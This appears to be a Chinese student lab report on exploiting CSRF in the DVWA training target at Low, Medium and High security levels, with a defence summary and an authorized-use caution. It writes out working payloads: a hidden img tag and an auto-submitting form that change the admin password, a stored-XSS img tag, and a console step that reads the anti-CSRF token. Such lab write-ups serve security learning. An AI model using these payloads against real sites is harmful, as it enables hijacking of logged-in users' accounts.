DVWA CSRF 漏洞实践报告

1. 漏洞简介

CSRF(跨站请求伪造)是一种攻击,使得攻击者能够以受害者的身份执行非预期的操作。在靶场DVWA中,我将尝试通过CSRF漏洞更改管理员密码。

2. 实验环境

  • DVWA版本:DVWA-old
  • 浏览器:火狐
  • 默认管理员账户:admin / password

3. 漏洞利用过程

3.1 Low 级别

步骤:
  1. 登录DVWA,将安全级别设置为Low
  1. 访问CSRF页面,观察更改密码的表单
  1. 先尝试在页面修改初始密码为"123",点击"Change(更改)"后,就出现下面的链接。
  1. 复制上面的 url,用Notepad+创建一个包含以下内容的HTML文件,命名为"csrf_attack.html"
html 复制代码
<img src="http://127.0.0.1/DVWA-old/vulnerabilities/csrf/?
password_new=hacked&password_conf=hacked&Change=Change" style="display:none;" />
  1. 在管理员已登录的状态下访问这个HTML文件 (注:一定要在同一个浏览器中打开)
  1. 最后,尝试使用新密码"hacked"登录
结果:
  • 攻击成功:能够使用"hacked"作为新密码登录,证实了密码已被更改。
  • 无用户交互:整个过程中,受害用户(管理员)没有直接在DVWA网站上执行任何操作。
    成功使用新密码"hacked"登录DVWA系统。

3.2 Medium 级别

步骤:
  1. 将安全级别设置为Medium
  1. 创建一个新的HTML文件,内容如下:
html 复制代码
<form action="http:///127.0.0.1/DVWA-old/vulnerabilities/csrf/" method="GET">
  <input type="hidden" name="password_new" value="hacked2">
  <input type="hidden" name="password_conf" value="hacked2">
  <input type="hidden" name="Change" value="Change">
</form>
<script>document.forms[0].submit();</script>
  1. 在管理员已登录的状态下访问这个HTML文件
  1. 尝试使用新密码"hacked2"登录
结果:
  • 攻击成功:在Medium安全级别下,成功更改了目标账户的密码。
  • 验证方法:使用新设置的密码成功登录DVWA系统,证实密码已被更改。

在DVWA的Medium安全级别下,我成功执行了CSRF攻击并更改了目标账户的密码,这表明尽管系统可能增加了一些基本的防御措施(如Referer检查或简单的令牌),但这些措施仍然不足以有效防止CSRF攻击。

与Low级别相比,Medium级别可能需要稍微复杂一些的攻击脚本来绕过这些基本安全检查,但攻击的成功执行凸显了即使在提高安全意识的情况下,如果没有实施更强大和全面的保护机制,Web应用程序仍然容易受到CSRF等攻击的影响。

这个结果强调了持续安全评估和多层次防御策略的重要性。


3.3 High 级别

步骤:
  1. 将安全级别设置为High
    (如图所示,进行相应操作即可完成安全级别的设置。)

  2. 观察 CSRF 页面的 URL,可发现其中包含 user_token。

  3. 尝试以下步骤:

先在DVWA中创建一个存储型XSS漏洞

  • 找到一个可以输入并存储数据的功能,通常是留言板或用户资料页面。
  • 在输入框中插入以下代码:
bash 复制代码
<img src="DVWA-old/vulnerabilities/csrf/?
password_new=password&password_conf=password&
Change=Change&user_token=d07b9b7912edf5f7c47afd29e44efb64#">

但是,发现这个留言板有字数限制,如下:

接下来,打开 "检查" 功能,将 Maxlength="50" 更改为 "500"。

但即便将有 token 的那个链接复制粘贴并且更改了长度,再输入同样的代码,显示空白,依然没有成功。

测试失败了。没关系,那么,我再尝试一下其他方法。


那么,这一次直接复制自己在 CSRF 设置的密码成功的链接,然后将其复制到一个新的标签页上。(注意:先暂时不要输入。)
上图打圈的部分是原链接 将原链接直接复制粘贴到新建的页面上

接下来,右击"检查",在"控制台"里输入输入shuru以下代码来获取 user_token:

bash 复制代码
document.getElementsByName("user_token")

然后,使用获取到的token在新标签页面里构造新的CSRF攻击。更改的过程细节如下:

原链接:

127.0.0.1/DVWA-old/vulnerabilities/csrf/?password_new=password &password_conf=password&Change=Change&

user_token=d07b9b7912edf5f7c47afd29e44efb64#

更改成:

127.0.0.1/DVWA-old/vulnerabilities/csrf/?password_new=123 &password_conf=123&Change=Change&

user_token=b6c092cedbfd6f750e0b4a40f8f24ea7#

结果

测试成功,成功实现了在 High 级别下的 CSRF 攻击利用。

4. 防御措施

根据不同级别的防御措施,总结以下几点:

  • Low:几乎没有防御
  • Medium:检查Referer头
  • High:使用anti-CSRF token

5. 学习心得

在进行 DVWA 中 CSRF 漏洞利用的实验过程中,我收获了许多宝贵的经验和深刻的感悟。

这个实验并非一帆风顺,从 Low 级别到 High 级别,每一步都充满了挑战。尤其是在 High 级别中,遇到了诸多障碍,如留言板的字数限制、初次尝试的失败等。然而,正是这些困难让我深刻体会到了永不放弃的重要性。

当面对一次次的失败时,心中也曾有过沮丧和迷茫。但我明白,放弃就意味着前功尽弃,只有坚持下去,不断尝试新的方法,才有可能找到突破的路径。于是,我一遍又一遍地审视问题,分析失败的原因,从不同的角度去思考解决方案。

在不断尝试的过程中,我不仅锻炼了自己的技术能力,更培养了坚韧不拔的毅力和解决问题的能力。我学会了在困境中保持冷静,不被挫折打倒,积极寻找新的思路和方法。

通过这次实验,我也更加深刻地认识到网络安全的重要性和复杂性。CSRF 漏洞的存在可能给系统带来严重的安全威胁,而不同安全级别的设置虽然在一定程度上增加了攻击的难度,但也并非绝对安全。这提醒着我们在实际的网络应用开发和维护中,必须高度重视安全问题,采取更加严格和有效的防御措施。

同时,这次实验也让我明白,学习是一个不断探索和尝试的过程。我们不能害怕失败,而应该把失败看作是成长的机会。只有在不断的实践和尝试中,我们才能不断提升自己的能力,掌握更多的知识和技能。

总之,这次 CSRF 漏洞实验是一次极具价值的学习经历。它让我懂得了坚持的力量,培养了我的问题解决能力,也加深了我对网络安全的认识。在未来的学习和工作中,我将继续保持这种不放弃的精神,勇于面对各种挑战,不断提升自己,为网络安全事业贡献自己的一份力量。

6. 注意事项

  • 仅在授权的环境中进行测试
  • 不要在真实的生产环境中尝试这些攻击
  • 学习CSRF漏洞的目的是为了更好地理解和防御此类攻击

7. 参考资料

相关推荐
用户9623779544814 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机17 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机17 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户9623779544819 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star19 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全
DianSan_ERP6 天前
电商API接口全链路监控:构建坚不可摧的线上运维防线
大数据·运维·网络·人工智能·git·servlet
red1giant_star6 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全